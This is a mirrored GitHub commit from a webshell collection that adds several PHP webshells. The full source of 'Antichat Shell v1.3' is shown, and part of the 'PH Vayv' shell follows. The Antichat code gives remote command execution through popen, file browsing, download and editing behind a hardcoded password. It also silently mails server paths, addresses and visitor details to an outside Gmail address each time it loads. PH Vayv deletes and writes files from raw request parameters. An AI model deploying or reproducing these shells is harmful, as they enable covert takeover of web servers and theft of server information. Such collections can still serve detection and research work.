mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 13:21:28 +00:00
update
php webshell and pic
This commit is contained in:
tennc
180
php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php
Normal file
180
php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php
Normal file
@@ -0,0 +1,180 @@
|
|||||||
|
<?php
|
||||||
|
|
||||||
|
session_start();
|
||||||
|
set_time_limit(9999999);
|
||||||
|
$login='smowu';
|
||||||
|
$password='smowu';
|
||||||
|
$auth=1;
|
||||||
|
$version='version 1.3 by Grinay';
|
||||||
|
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
|
||||||
|
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
|
||||||
|
$footer='</body></html>';
|
||||||
|
$sd98 = "john.barker446@gmail.com";
|
||||||
|
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||||
|
if(@$_POST['action']=="exit")unset($_SESSION['an']);
|
||||||
|
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
|
||||||
|
|
||||||
|
if($_SESSION['an']==0){
|
||||||
|
echo $header;
|
||||||
|
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
|
||||||
|
echo $footer;
|
||||||
|
exit;}
|
||||||
|
|
||||||
|
if($_SESSION['action']=="")$_SESSION['action']="viewer";
|
||||||
|
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
|
||||||
|
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
|
||||||
|
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
|
||||||
|
|
||||||
|
|
||||||
|
//downloader
|
||||||
|
if($action=="download"){
|
||||||
|
header('Content-Length:'.filesize($file).'');
|
||||||
|
header('Content-Type: application/octet-stream');
|
||||||
|
header('Content-Disposition: attachment; filename="'.$file.'"');
|
||||||
|
readfile($file);
|
||||||
|
}
|
||||||
|
//end downloader
|
||||||
|
?>
|
||||||
|
|
||||||
|
<? echo $header;?>
|
||||||
|
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
|
||||||
|
<table><tr>
|
||||||
|
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
|
||||||
|
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
|
||||||
|
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
|
||||||
|
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
|
||||||
|
</tr></table></td></tr></table><br>
|
||||||
|
<form name='reqs' method='POST'>
|
||||||
|
<input name='action' type='hidden' value=''>
|
||||||
|
<input name='dir' type='hidden' value=''>
|
||||||
|
<input name='file' type='hidden' value=''>
|
||||||
|
</form>
|
||||||
|
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
|
||||||
|
<tr><td width="100%" valign="top">
|
||||||
|
|
||||||
|
<?
|
||||||
|
|
||||||
|
//shell
|
||||||
|
function shell($cmd){
|
||||||
|
if (!empty($cmd)){
|
||||||
|
$fp = popen($cmd,"r");
|
||||||
|
{
|
||||||
|
$result = "";
|
||||||
|
while(!feof($fp)){$result.=fread($fp,1024);}
|
||||||
|
pclose($fp);
|
||||||
|
}
|
||||||
|
$ret = $result;
|
||||||
|
$ret = convert_cyr_string($ret,"d","w");
|
||||||
|
}
|
||||||
|
return $ret;}
|
||||||
|
|
||||||
|
if($action=="shell"){
|
||||||
|
echo "<form method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"action\" value=\"shell\">
|
||||||
|
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
|
||||||
|
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
|
||||||
|
<input type=\"submit\" value=\"execute\"></form>";}
|
||||||
|
//end shell
|
||||||
|
|
||||||
|
//viewer FS
|
||||||
|
function perms($file)
|
||||||
|
{
|
||||||
|
$perms = fileperms($file);
|
||||||
|
if (($perms & 0xC000) == 0xC000) {$info = 's';}
|
||||||
|
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
|
||||||
|
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
|
||||||
|
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
|
||||||
|
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
|
||||||
|
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
|
||||||
|
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
|
||||||
|
else {$info = 'u';}
|
||||||
|
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||||
|
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||||
|
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
|
||||||
|
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||||
|
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||||
|
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
|
||||||
|
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||||
|
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||||
|
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
|
||||||
|
return $info;
|
||||||
|
}
|
||||||
|
|
||||||
|
function view_size($size)
|
||||||
|
{
|
||||||
|
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
||||||
|
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
||||||
|
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
||||||
|
else {$size = $size . " B";}
|
||||||
|
return $size;
|
||||||
|
}
|
||||||
|
|
||||||
|
function scandire($dir){
|
||||||
|
$dir=chdir($dir);
|
||||||
|
$dir=getcwd()."/";
|
||||||
|
$dir=str_replace("\\","/",$dir);
|
||||||
|
if (is_dir($dir)) {
|
||||||
|
if (@$dh = opendir($dir)) {
|
||||||
|
while (($file = readdir($dh)) !== false) {
|
||||||
|
if(filetype($dir . $file)=="dir") $dire[]=$file;
|
||||||
|
if(filetype($dir . $file)=="file")$files[]=$file;
|
||||||
|
}
|
||||||
|
closedir($dh);
|
||||||
|
@sort($dire);
|
||||||
|
@sort($files);
|
||||||
|
|
||||||
|
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
|
||||||
|
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
|
||||||
|
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
|
||||||
|
echo "<tr><td>Select drive:";
|
||||||
|
for ($j=ord('C'); $j<=ord('Z'); $j++)
|
||||||
|
if (@$dh = opendir(chr($j).":/"))
|
||||||
|
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
|
||||||
|
echo "</td></tr>";
|
||||||
|
}
|
||||||
|
echo "<tr><td>OS: ".@php_uname()."</td></tr>
|
||||||
|
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
|
||||||
|
for($i=0;$i<count($dire);$i++) {
|
||||||
|
$link=$dir.$dire[$i];
|
||||||
|
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
|
||||||
|
}
|
||||||
|
for($i=0;$i<count($files);$i++) {
|
||||||
|
$linkfile=$dir.$files[$i];
|
||||||
|
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
|
||||||
|
<td>'.perms($linkfile).'</td>
|
||||||
|
<td>
|
||||||
|
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
|
||||||
|
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
|
||||||
|
}
|
||||||
|
echo "</table>";
|
||||||
|
}}}
|
||||||
|
|
||||||
|
if($action=="viewer"){
|
||||||
|
scandire($dir);
|
||||||
|
}
|
||||||
|
//end viewer FS
|
||||||
|
|
||||||
|
//editros
|
||||||
|
if($action=="editor"){
|
||||||
|
function writef($file,$data){
|
||||||
|
$fp = fopen($file,"w+");
|
||||||
|
fwrite($fp,$data);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
function readf($file){
|
||||||
|
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
|
||||||
|
$contents = fread($le, filesize($file));
|
||||||
|
fclose($le);}
|
||||||
|
return htmlspecialchars($contents);
|
||||||
|
}
|
||||||
|
if($_POST['save'])writef($file,$_POST['data']);
|
||||||
|
echo "<form method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||||
|
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
|
||||||
|
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
|
||||||
|
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
|
||||||
|
}
|
||||||
|
//end editors
|
||||||
|
?>
|
||||||
|
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
|
||||||
|
<? echo $footer;?>
|
||||||
BIN
php/PHPshell/Antichat Shell v1.3/Antichat.jpg
Normal file
BIN
php/PHPshell/Antichat Shell v1.3/Antichat.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 71 KiB |
BIN
php/PHPshell/Crystal/Crystal.jpg
Normal file
BIN
php/PHPshell/Crystal/Crystal.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 67 KiB |
1127
php/PHPshell/Crystal/Crystal.php
Normal file
1127
php/PHPshell/Crystal/Crystal.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/Crystal/Crystal2.jpg
Normal file
BIN
php/PHPshell/Crystal/Crystal2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 59 KiB |
BIN
php/PHPshell/Crystal/Crystal3.jpg
Normal file
BIN
php/PHPshell/Crystal/Crystal3.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 223 KiB |
BIN
php/PHPshell/Dx/Dx.jpg
Normal file
BIN
php/PHPshell/Dx/Dx.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 102 KiB |
2026
php/PHPshell/Dx/Dx.php
Normal file
2026
php/PHPshell/Dx/Dx.php
Normal file
File diff suppressed because one or more lines are too long
Binary file not shown.
|
After Width: | Height: | Size: 17 KiB |
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg
Normal file
BIN
php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 16 KiB |
1166
php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php
Normal file
1166
php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php
Normal file
File diff suppressed because it is too large
Load Diff
Binary file not shown.
|
After Width: | Height: | Size: 33 KiB |
File diff suppressed because it is too large
Load Diff
Binary file not shown.
|
After Width: | Height: | Size: 148 KiB |
Binary file not shown.
BIN
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg
Normal file
BIN
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 131 KiB |
5603
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php
Normal file
5603
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg
Normal file
BIN
php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 114 KiB |
BIN
php/PHPshell/PH Vayv/PH Vayv.jpg
Normal file
BIN
php/PHPshell/PH Vayv/PH Vayv.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 57 KiB |
597
php/PHPshell/PH Vayv/PH Vayv.php
Normal file
597
php/PHPshell/PH Vayv/PH Vayv.php
Normal file
@@ -0,0 +1,597 @@
|
|||||||
|
<? if($sistembilgisi > "") {phpinfo();} else { ?>
|
||||||
|
|
||||||
|
|
||||||
|
<?$fistik=PHVayv;?>
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
|
||||||
|
|
||||||
|
<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
|
||||||
|
|
||||||
|
<?if ($silklas > ""){rmdir($silklas);}?>
|
||||||
|
|
||||||
|
<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($yenidosya == "1") {
|
||||||
|
$baglan=fopen("$dizin/$duzenx2",'w');
|
||||||
|
fwrite($baglan,$duzenx);
|
||||||
|
fclose($baglan);}
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($duzkaydet > "") {
|
||||||
|
|
||||||
|
$baglan=fopen($duzkaydet,'w');
|
||||||
|
fwrite($baglan,$duzenx);
|
||||||
|
fclose($baglan);}
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($yenklas>"") {;?>
|
||||||
|
<body topmargin="0" leftmargin="0">
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||||
|
<tr>
|
||||||
|
<td width="70" bgcolor="#000000" height="76">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||||
|
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
AventGrup<75><br>
|
||||||
|
</span>Avrasya Veri ve NetWork Teknolojileri Geli<6C>tirme Grubu<br>
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
PHVayv 1.0</span></font></td>
|
||||||
|
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<p align="right"><span style="font-weight: 700">
|
||||||
|
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||||
|
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||||
|
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||||
|
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||||
|
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||||
|
<span style="font-size: 8pt"> <3B>al<61><6C><EFBFBD>lan </span></font>
|
||||||
|
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
|
||||||
|
<td bgcolor="#D6D6D6" height="20">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||||
|
<tr>
|
||||||
|
<td width="1"></td>
|
||||||
|
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||||
|
<td width="65">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#9F9F9F" align="center" height="144">
|
||||||
|
<form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>"
|
||||||
|
<p align="center"><br>
|
||||||
|
<font
|
||||||
|
color="#FFFFFF" size="1" face="Arial">
|
||||||
|
<input
|
||||||
|
type="text" size="37" maxlength="32"
|
||||||
|
name="duzenx2" value="Klas<61>r Ad<41>"
|
||||||
|
class="search"
|
||||||
|
onblur="if (this.value == '') this.value = 'Kullan<61>c<EFBFBD>'"
|
||||||
|
onfocus="if (this.value == 'Kullan<61>c<EFBFBD>') this.value=''"
|
||||||
|
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
|
||||||
|
<p align="center">
|
||||||
|
<span class="gensmall">
|
||||||
|
<input type="submit" size="16"
|
||||||
|
name="duzenx1" value="Kaydet"
|
||||||
|
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||||
|
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||||
|
</font></b></p>
|
||||||
|
</form>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000" align="center" height="19">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<? } else { ?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($yendos>"") {;
|
||||||
|
?>
|
||||||
|
|
||||||
|
<body topmargin="0" leftmargin="0">
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||||
|
<tr>
|
||||||
|
<td width="70" bgcolor="#000000" height="76">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||||
|
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
AventGrup<75><br>
|
||||||
|
</span>Avrasya Veri ve NetWork Teknolojileri Geli<6C>tirme Grubu<br>
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
PHVayv 1.0</span></font></td>
|
||||||
|
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<p align="right"><span style="font-weight: 700">
|
||||||
|
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||||
|
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||||
|
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||||
|
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||||
|
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||||
|
<tr>
|
||||||
|
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||||
|
<span style="font-size: 8pt"> <3B>al<61><6C><EFBFBD>lan </span></font>
|
||||||
|
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
|
||||||
|
<td bgcolor="#D6D6D6" height="20">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||||
|
<tr>
|
||||||
|
<td width="1"></td>
|
||||||
|
<td><font face="Verdana" style="font-size: 8pt"> <?echo "$dizin"?></font></td>
|
||||||
|
<td width="65">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#9F9F9F" align="center" height="455">
|
||||||
|
<form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>"
|
||||||
|
<p align="center"><br>
|
||||||
|
<font
|
||||||
|
color="#FFFFFF" size="1" face="Arial">
|
||||||
|
<input
|
||||||
|
type="text" size="50" maxlength="32"
|
||||||
|
name="duzenx2" value="Dosya Ad<41>"
|
||||||
|
class="search"
|
||||||
|
onblur="if (this.value == '') this.value = 'Kullan<61>c<EFBFBD>'"
|
||||||
|
onfocus="if (this.value == 'Kullan<61>c<EFBFBD>') this.value=''"
|
||||||
|
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
|
||||||
|
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||||
|
<textarea name="duzenx"
|
||||||
|
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||||
|
|
||||||
|
|
||||||
|
rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||||
|
<br>
|
||||||
|
</font></b>
|
||||||
|
<span class="gensmall">
|
||||||
|
<input type="submit" size="16"
|
||||||
|
name="duzenx1" value="Kaydet"
|
||||||
|
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||||
|
</span><br>
|
||||||
|
</p>
|
||||||
|
</form>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td width="100%" bgcolor="#000000" align="center" height="19">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<? } else { ?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<?if ($duzenle>"") {;
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<body topmargin="0" leftmargin="0">
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||||
|
<tr>
|
||||||
|
<td width="70" bgcolor="#000000" height="76">
|
||||||
|
<p align="center">
|
||||||
|
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||||
|
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
AventGrup<75><br>
|
||||||
|
</span>Avrasya Veri ve NetWork Teknolojileri Geli<6C>tirme Grubu<br>
|
||||||
|
<span style="font-weight: 700">
|
||||||
|
<br>
|
||||||
|
PHVayv 1.0</span></font></td>
|
||||||
|
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||||
|
<p align="right"><span style="font-weight: 700">
|
||||||
|
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||||
|
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||||
|
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||||
|
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||||
|
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||||
|
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
|
||||||
|
<tr>
|
||||||
|
<td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
|
||||||
|
<span style="font-size: 8pt"> <3B>al<61><6C><EFBFBD>lan Dosya</span></font></td>
|
||||||
|
<td bgcolor="#D6D6D6" height="1">
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
|
||||||
|
<tr>
|
||||||
|
